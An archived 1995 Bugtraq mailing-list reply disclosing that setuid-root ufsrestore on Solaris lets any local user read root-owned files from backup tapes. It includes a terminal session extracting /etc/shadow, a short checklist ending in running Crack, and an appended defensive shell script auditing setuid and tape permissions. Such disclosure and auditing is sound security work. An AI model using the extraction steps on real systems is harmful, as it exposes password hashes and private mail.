[2445] in bugtraq
Re: ufsrestore suid root not a security hole
daemon@ATHENA.MIT.EDU (Eduardo E. Silva)
Tue Dec 12 12:21:12 1995
Date: Tue, 12 Dec 1995 00:39:30 -0800
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: "Eduardo E. Silva" <esilva@NETCOM.COM>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <199511170445.OAA05276@chimaera.itc.gu.edu.au> from "Sean
Vickery" at Nov 17, 95 02:45:45 pm
Sean Vickery wrote:
>
> On 14 November 1995, Brett Lymn wrote:
> > According to Jake Luck:
> > >
> > >yeah, but what about /usr/sbin/ufsrestore ?
> > >
> > >it is statically linked, utilizes syslog, and suid root.
> > >
> >
> > If you are a BOFH then just kill the setuid bit on ufsrestore. It
> > means that root has to do the restores but it does close an awful lot
> > of holes (like someone dragging in a QIC and restoring their favourite
> > version of /etc/passwd.... need I say more?). Or you could just
> > remove the global rx though this may bugger up remote root users.
>
> Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box. But it is more
> careful than to allow an unprivileged user to create or overwrite files just
> anywhere.
>
BUT, it will let you read ANY file from the tape, including
root-owned files such as /etc/shadow.
* Know when UNIX admins run backups.
* Extract files with ufsrestore (/etc/shadow)
* Run Crack.
* Or you could be reading root's mail, CEO email, etc.

$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
sense key(0x0)= No Additional Sense residual= 0 retries= 0
file no= 0 block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
.rhosts .sh_history devices/ etc/
ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x 2 esilva other 512 Dec 11 19:54 .
drwxr-xr-x 3 esilva other 512 Oct 11 21:48 ..
-r-------- 1 esilva other 1144 Oct 9 09:21 shadow.1.la
Now run crack...
--
Thanks!
-Ed _
/\o/\
/ <_> \
/^^/ \^^\
/___\
+---------------------------------------------------------------------+
| Can you see them all around us? |
+---------------------------------------------------------------------+
| esilva@netcom.com |
+---------------------------------------------------------------------+
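
An audit for the two mitigations quoted in this thread (dropping the setuid bit on ufsrestore, or removing its world execute permission), as an added example that is not part of the original post. It also checks, as an extension beyond the thread, whether the tape device is readable by "other", since a directly readable device exposes the same dump data without ufsrestore. The default paths are the ones in the session above; RESTORE_BIN and TAPE_DEVS are hypothetical override variables.

```shell
#!/bin/sh
# Added example (not from the original post): audit the setuid/tape exposure.
# RESTORE_BIN and TAPE_DEVS are hypothetical override variables; the default
# paths are the ones that appear in the post's terminal session.

# has_mode PATH BITS: succeeds when every bit in BITS is set on PATH.
# find -L follows symlinks, so a /dev/rmt link is judged by its target.
has_mode() {
    [ -n "$(find -L "$1" -prune -perm "-$2" -print 2>/dev/null)" ]
}

# Returns 1 when PATH is setuid and executable by "other", meaning any local
# user can run the restore with the file owner's privileges.
audit_restore_binary() {
    [ -e "$1" ] || { echo "SKIP  $1: not present"; return 0; }
    if has_mode "$1" 4000 && has_mode "$1" 0001; then
        echo "FAIL  $1: setuid and executable by other"
        return 1
    elif has_mode "$1" 4000; then
        echo "WARN  $1: setuid, restricted to owner/group"
    else
        echo "OK    $1: no setuid bit"
    fi
    return 0
}

# Returns 1 when "other" can read the tape device (or a stand-in file).
audit_tape_device() {
    [ -e "$1" ] || { echo "SKIP  $1: not present"; return 0; }
    if has_mode "$1" 0004; then
        echo "FAIL  $1: readable by other"
        return 1
    fi
    echo "OK    $1: not readable by other"
    return 0
}

# Runs every check; non-zero exit status if any check failed.
audit_all() {
    rc=0
    audit_restore_binary "${RESTORE_BIN:-/usr/sbin/ufsrestore}" || rc=1
    for dev in ${TAPE_DEVS:-/dev/rmt/0 /dev/rmt/0cn}; do
        audit_tape_device "$dev" || rc=1
    done
    return "$rc"
}

if [ "${1:-}" = "--run" ]; then audit_all; fi
```

Invoke the script with `--run` to check the default paths; a non-zero exit status means at least one FAIL line was printed.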